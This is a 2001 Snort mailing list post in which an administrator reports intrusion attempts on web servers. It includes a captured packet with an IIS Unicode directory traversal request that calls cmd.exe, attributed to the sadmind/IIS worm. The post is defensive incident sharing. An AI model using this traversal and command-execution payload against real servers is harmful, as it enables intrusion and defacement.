Snort mailing list archives
Intrusion Detection Event
From: Claude Bailey <Claude.Bailey () RIAG com>
Date: Wed, 9 May 2001 15:01:33 -0500
The sample Internet data packet below was one of 28 we received from China on 5/8/01 to our web-servers. The packet request includes a signature of the sadmind/IIS worm and tries to load a DOS command box. This attack is being used to deface web-servers. [**] WEB-MISC http directory traversal [**] 05/08-00:44:17.902561 202.107.205.193:34044 -> a.b.c.d:80 TCP TTL:236 TOS:0x0 ID:26709 IpLen:20 DgmLen:106 DF ***AP*** Seq: 0x75F5569F Ack: 0x4307F098 Win: 0x2238 TcpLen: 20 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 c1%1c../winnt/sy 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Current thread:
- Intrusion Detection Event Claude Bailey (May 09)